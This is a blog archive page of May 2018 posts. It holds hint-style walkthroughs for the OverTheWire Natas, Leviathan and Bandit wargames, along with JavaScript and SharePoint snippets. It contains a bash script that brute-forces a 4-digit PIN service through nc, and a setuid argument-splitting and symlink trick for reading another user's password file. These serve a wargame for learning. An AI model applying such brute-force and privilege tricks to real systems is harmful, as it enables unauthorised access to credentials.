Showing posts from May, 2018

OverTheWire[.com] Natas Walkthrough - JUST HINT, NO SPOILERS

game portal:
PASSWORDS for each level are stored in /etc/natas_webpass/natasX

I made this walkthrough for people like me: I needed some help, but didn't want the spoiler, so here I give you all the information needed to pass each level, yet not the solution.

For the levels that need a custom web request I made a separate post with PowerShell and JavaScript how-tos, since that is a piece of learning by itself, and also for those of us who play at work and have only PowerShell at hand. Although it is not a complete spoiler, it is most of the solution, so try it yourself first.

The Natas game goes from basic to advanced web hacking. Every few levels introduce a whole new exploitation technique (with some of the harder ones making a comeback later), so there is a lot of learning.

If you're new, you're the reason I write so much even for the first level; just please google EVERY topic you see, since in the following levels I assume you know the previous topi…

Natas Powershell and JavaScript Helper (OverTheWire)

I did most of Natas from work, where I couldn't have anything but Windows PowerShell or the browser's console for JavaScript, so here are examples of how to use them for the game, for anyone in the same position.


Even though I tried not to make this the solutions, it is kind of the solution.

Level 4: HTTP Headers

# basics for working with .Net WebClient
# create a variable with a value
$u=""
# creating new Object you need to specify the full namespaces and classes route
$wc=New-Object System.Net.WebClient
# this is how you send user and pass
$c=New-Object System.Net.NetworkCredential("natas4","............")
$wc.Credentials=$c
# adding headers.
# adding a cookie is just "cookie", "name=value".
$wc.Headers.Add("header-name","header-value")
# download the same html you see in "view-source".
# you can also more elegantly store this in a variable and print it lik
# …

Javascript Event Oriented Programming example on SPSocialFeed

SPSocialFeed is the SharePoint microblog, where you can post your thoughts and reply to yourself and others.

We wanted to add some functionality for every reply and post added, so I used the (then new) MutationObserver and CustomEvent browser APIs, together with ES6 classes, to implement the solution in an event-driven way.
// batman is the man in-charge catching the bad guys in the night.
// so now he catches the good events in the feed
let batman = (function () {
  let config = { childList: true };
  let batman = class batman {
    constructor() {
      this.v = "2.0.0";
      // register call to batCave fn. to _spBodyOnLoadFunctionNames, the SP onready
      _spBodyOnLoadFunctionNames.push('batman.batCave');
    }
    batCave() {
      let feed = document.getElementById('ms-feedthreadsdiv');
      // childNodes can be any type of nodes, like text node. children is only HTMLElements childNodes.
      let posts = feed.children;
      let evt = new CustomEvent('feedReady', { detail: { feed: feed, posts: posts } });
      console.log('batman fire feedReady event');
      …

Javascript Export Interface Implementation

For some time I've been thinking: how can I export a JS object that exposes only its public functions, yet keeps all my million other functions "hidden", just to make it less messy?

The point is to create an anonymous function and create the instance inside it, while returning a new object whose members point at the instance's functions, each one ".bind"-ed to the instance.

So here it is:
let encapsulated = (function encapsulated_builder() {
  let encapsulated = class encapsulated {
    constructor() {
      // the property name did not survive on the page; "food" is assumed here
      this.food = 'bamba';
      this.animal = 'lion';
    }
    addFood(f) { this.food += ' ' + f; }
    addFoodByAnimal(a) {
      switch (a) {
        case 'dog': this.addFood('bone'); break;
        case 'cat': this.addFood('fish'); break;
      }
    }
    addAnimal(a) {
      this.animal += ' ' + a;
      this.addFoodByAnimal(a);
    }
    printFood() { console.log(this.food); }
    printAnimal() { console.log(this.animal); }
  };
  let enc_instance = new encapsulated();
  // only these members are exported; everything else stays inside the closure
  return {
    addAnimal: enc_instance.addAnimal.bind(enc_instance),
    printFood: enc_instance.printFood.bind(e…

OverTheWire[.com] Leviathan Walkthrough - JUST HINT, NO SPOILERS

game portal:
PASSWORDS for each level are stored in /etc/leviathan_pass/leviathanX

The Leviathan game is about basic debugging/hacking/tracing of binary files on Linux, and how to exploit them.
The main tool you will use here is ltrace, so read and google about it. Use it in ALL levels except Level 0, even if I don't mention it.

Another important note: most of the files have the "s" (setuid) flag in their permissions, meaning they run with the file owner's elevated privileges, and that is important for understanding the solutions. Go read about that too.

Level 0: Bookmarks

bookmarks.html is the file Chrome creates when you export all your bookmarks; people can save sensitive info there.

Level 1: Introduction to "ltrace"

Time to use ltrace.

Level 2: Exploiting "cat"

Most of the tutorials out there are out of date: they exploit symbolic links and "cat".
You can still exploit "cat", but it won't…

OverTheWire[.com] Bandit Walkthrough - JUST HINT, NO SPOILERS

OverTheWire Bandit walkthrough - JUST HINT, NO SPOILERS: just all the hints you need.

I made this walkthrough for people like me: I needed some help here and there, but didn't want the spoiler, and even with some blogs (mentioned with appreciation) that keep the solution collapsed, there is no help if I don't know what to do; I just need some pointers.

So let's go.
game portal is

The Bandit game is mostly an introduction to ssh, the bash shell and their tricks.

Pre Level 0: Connect to SSH

If you use Linux, your command is "ssh" and that's it.
For Windows you'll need to download a client; it's in the Level 0 hints (wikihow).
Eventually you need to learn more about the ssh command, but the basic form of a connection is "ssh <user>@<domain> -p <port>".
CTRL+C breaks the running process, CTRL+D exits the current user's shell.
I wrote this one down since I couldn't find a nice pag…

OverTheWire Bandit24 script

#!/bin/bash
# Bandit24 -> Bandit25: brute-force the 4-digit pincode the daemon on localhost:30002 asks for.
# Each attempt is one connection sending "<bandit24 password> <pincode>".

rm -f out

p=$(cat /etc/bandit_pass/bandit24)
echo "$p"

echo "trying 0000-9999"

for i in $(seq 0 9999); do
  n=$(printf '%04d' "$i")    # zero-pad, so 0-999 are sent as 0000-0999
  echo "$p $n"
  res=$(echo "$p $n" | nc localhost 30002)
  echo "res: $n $res" | tee -a out   # log every answer, keep the loop output on screen

  if [[ $res =~ Correct ]]; then
    break
  fi
done


leviathan level 2 overthewire - updated challenge

leviathan 2 overthewire setreuid(12002, 12002)

Start by making a folder with "mktemp -d", make a file in it, and run ltrace ./printfile <your file>.
Most tutorials will show you how to get this done with a link file; they are good tutorials and test cases as they are, so read them.

Trying that, INSIDE our tmp folder:
ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.ydhTgRu2oq/b
ltrace ~/printfile /tmp/tmp.ydhTgRu2oq/a\ b
will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: Permission denied
This is because of these 2 lines:
setreuid(12002, 12002)

But I guess that was not the hack, and in the end we see that the final line executing is
Anyway, like above, or with just a file named "a b" and another named "b", the output is
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: No such file or directory

The important thing: "cat" did try to concatenate two files, so the space in the path made the shell split "a b" into two separate arguments.
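The argument splitting the two outputs above show, as an added example that is not from the original post: printfile is assumed to hand its argument to system("/bin/cat <arg>") unquoted, exactly as the ltrace line shows, so here "sh -c" with the same string stands in for the binary (no setuid is involved, so only the "No such file" / second-file behaviour is reproduced, not the "Permission denied" case). The directory, the file names "a b" and "b", and their contents are constructed for the demo, and the quoted variant is added for contrast.

```sh
#!/bin/sh
# Added demo, not the printfile binary: emulate an unquoted system("/bin/cat <arg>")
# call and show what the shell does with a path that contains a space.
set -e

# Assumed reconstruction of printfile's call: one string, run by /bin/sh, no quoting.
emulate_printfile() {
    sh -c "/bin/cat $1"
}

# The same call with the argument quoted: the inner shell now sees one argument.
emulate_printfile_quoted() {
    sh -c '/bin/cat "$1"' sh "$1"
}

# Constructed test directory: a file named "a b" and a file named "b".
setup_dir() {
    d=$(mktemp -d)
    printf 'contents of "a b"\n' > "$d/a b"
    printf 'contents of "b"\n'   > "$d/b"
    echo "$d"
}

# Unquoted: sh runs `/bin/cat /tmp/tmp.X/a b`, so cat fails on "/tmp/tmp.X/a"
# and then reads "b" relative to the current directory (the second file).
unquoted_output() {
    d=$(setup_dir)
    ( cd "$d" && emulate_printfile "$d/a b" 2>&1 ) || true
}

# Quoted: cat receives the single path "/tmp/tmp.X/a b" and prints that file.
quoted_output() {
    d=$(setup_dir)
    ( cd "$d" && emulate_printfile_quoted "$d/a b" 2>&1 )
}
```

Run from inside the temp directory, unquoted_output prints the error for the missing "…/a" followed by the contents of "b" (the exact behaviour behind the "Permission denied" and "No such file" lines above, minus the privilege drop), while quoted_output prints only the contents of "a b".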

But to the real hack... make a folder in your tmp like th…